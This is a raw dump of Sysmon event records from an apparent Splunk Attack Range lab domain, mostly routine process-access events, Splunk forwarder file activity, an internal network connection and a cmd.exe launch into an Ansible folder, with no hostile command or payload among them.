07:51:31.141{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.141{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.141{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.141{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.141{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.141{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.141{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:31.141{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x8000000000000000807470Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:32.940{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D49B9709F3AC8FBDAA6DBEAD43AA1B0B,SHA256=CE553AA5DC360B5DCA657991D081E1E02546930C29D7BC15131B0F770A481228,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:32.977{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:32.977{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:32.977{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:32.977{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:32.977{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:32.977{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+1f9aa4|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+175730|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHEL
L32.dll+16d7a6|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07 154100x80000000000000001048291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:32.966{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /s /k pushd "C:\Program Files\ansible\sysmon"C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001048290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:32.493{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=880EB383399168C96E80D9DEE024F9ED,SHA256=9C9563914E111F4B4CB05CC4C7E0301A32641A5140B9028A39ACF1E04C8E863E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807469Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:30.308{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57254-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:32.162{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=035B8861D3C08B46AD8A384BD09F1381,SHA256=97FEDE477AFE88891AF828A43EC64B7C8FEDC7532FA13FB67CCAF0AECAFF647B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:32.161{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=211494739029E76066F63A62A8DA8075,SHA256=8F1710C66B605BB633773D1263556F03F99B03B11BF4309EECB53DD28CECE7EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807472Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:33.956{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1A46565A40426D5C50A6203A98367EF,SHA256=569254BFF94B46EEABE2889C573F7BD50C4F2C7A16FFE0491E64BAF326E6491E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.980{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=035B8861D3C08B46AD8A384BD09F1381,SHA256=97FEDE477AFE88891AF828A43EC64B7C8FEDC7532FA13FB67CCAF0AECAFF647B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.508{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7250CC94FE43BA589661D0A7ABC2851,SHA256=6FAE5E45D45E18614A7E12DFDC478018A6576AA1E1B352CD7E408E3271D0A392,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807471Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:30.360{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57255-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 10341000x80000000000000001048314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.140{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:33.140{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.140{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
